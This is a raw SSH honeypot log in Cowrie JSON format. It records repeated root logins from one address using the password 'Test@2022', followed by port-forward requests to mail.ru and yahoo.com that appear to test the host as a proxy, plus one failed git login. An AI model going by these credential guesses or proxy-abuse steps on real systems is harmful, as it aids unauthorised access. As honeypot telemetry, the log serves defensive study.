{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.258417Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.509449Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32030,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32030","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.560548Z","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.610944Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":22221,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22221","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.753205Z","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.803783Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":10920,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10920","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.948697Z","session":"103c4038b0e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.999104Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.050944Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4842,"dst_ip":"1.2.3.4","dst_port":22,"session":"7077d022cd54","protocol":"ssh","message":"New connection: 77.83.207.83:4842 (1.2.3.4:22) [session: 7077d022cd54]","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.100599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.101649Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.152113Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.403625Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13381,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13381","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.455747Z","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.506248Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":421,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:421","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.648899Z","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.699649Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":21535,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21535","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.841414Z","session":"7077d022cd54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.891839Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.943145Z","src_ip":"77.83.207.83","session":"7077d022cd54"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4940,"dst_ip":"1.2.3.4","dst_port":22,"session":"45f5d29cc75d","protocol":"ssh","message":"New connection: 77.83.207.83:4940 (1.2.3.4:22) [session: 45f5d29cc75d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.992108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:42.993036Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.043294Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.293021Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30121,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30121","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.343815Z","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.393991Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":3478,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3478","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.536330Z","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.586317Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":6136,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6136","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.728470Z","session":"45f5d29cc75d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.778693Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.829838Z","src_ip":"77.83.207.83","session":"45f5d29cc75d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5043,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a4cce56b1a8","protocol":"ssh","message":"New connection: 77.83.207.83:5043 (1.2.3.4:22) [session: 9a4cce56b1a8]","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.877891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.878923Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:43.928408Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.175965Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32064,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32064","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.227099Z","session":"9a4cce56b1a8"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.252071Z","src_ip":"212.227.125.160","session":"3a579c9a3040"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.276994Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":29665,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29665","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.416165Z","session":"9a4cce56b1a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.466026Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":25593,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25593","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.608156Z","session":"9a4cce56b1a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.658121Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.709410Z","src_ip":"77.83.207.83","session":"9a4cce56b1a8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5135,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7757b62a090","protocol":"ssh","message":"New connection: 77.83.207.83:5135 (1.2.3.4:22) [session: a7757b62a090]","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.758035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.759027Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:44.809191Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.057564Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1357,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1357","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.108795Z","session":"a7757b62a090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.158646Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":29212,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29212","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.300190Z","session":"a7757b62a090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.350087Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
